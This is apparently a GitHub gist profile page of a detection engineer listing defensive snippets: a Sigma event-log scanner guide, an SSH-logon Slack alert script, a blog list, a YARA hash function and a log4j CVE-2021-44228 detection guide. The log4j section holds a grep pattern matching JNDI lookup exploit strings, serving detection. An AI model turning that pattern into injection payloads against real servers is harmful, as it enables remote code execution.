Skip to content

Instantly share code, notes, and snippets.

Avatar

Florian Roth Neo23x0

View GitHub Profile
@Neo23x0
Neo23x0 / sigma-evtx-scan.md
Last active March 27, 2023 21:11
Guide to Use Sigma EVTX Checker
View sigma-evtx-scan.md

Guide to Use Nextron's Sigma EVTX Checker

It's a fast go-based scanner for Linux, Windows, and macOS that applies Sigma rules and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone https://github.com/SigmaHQ/sigma.git
cd sigma
@Neo23x0
Neo23x0 / nighthawk-blog-posts.md
Last active December 2, 2022 10:37
Collection of Deleted Articles on MDSec's Nighthawk
View nighthawk-blog-posts.md
@Neo23x0
Neo23x0 / send-to-slack.sh
Created September 11, 2022 21:22
Slack Hook - System Logon
View send-to-slack.sh
#!/bin/bash -x
hostname=$(hostname)
source=$(echo "$SSH_CONNECTION" | cut -d' ' -f 1)
geo=$(geoiplookup "$source")
curl -X POST --silent --data "payload={\"text\": \":bust_in_silhouette: SYSTEM: $hostname USER: $USER SOURCE: $source GEO: $geo\"}" https://hooks.slack.com/services/XXXXXXXX_YOURHOOK_XXXXX > /dev/null
@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
View cyber-security-blogs.txt
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@Neo23x0
Neo23x0 / nvidia_cert_leak_vt_dorks.md
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active March 16, 2023 17:10
Log4j RCE CVE-2021-44228 Exploitation Detection
View log4j_rce_detection.md

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@Neo23x0
Neo23x0 / minecraft-seus-shader.md
Last active December 11, 2021 11:15
Minecraft with SEUS Shader - Guide
View minecraft-seus-shader.md
@Neo23x0
Neo23x0 / help.md
Last active January 31, 2023 21:57
Offensive Research Guide to Help Defense Improve Detection
View help.md

I've transformed this gist into a git repository.


Whenever you research a certain vulnerability ask yourself these questions and please answer them for us

Logging

Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)

@Neo23x0
Neo23x0 / snippet_gen_yara_hash.py
Created October 10, 2020 15:51
YARA Rule Hash Used by Nextron Systems
View snippet_gen_yara_hash.py
import hashlib
import re
def calculate_rule_hash(rule):
"""
Calculates a hash over the relevant YARA rule content (string contents, sorted condition)
Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara
:param rule: yara rule object
:return hash: generated hash
"""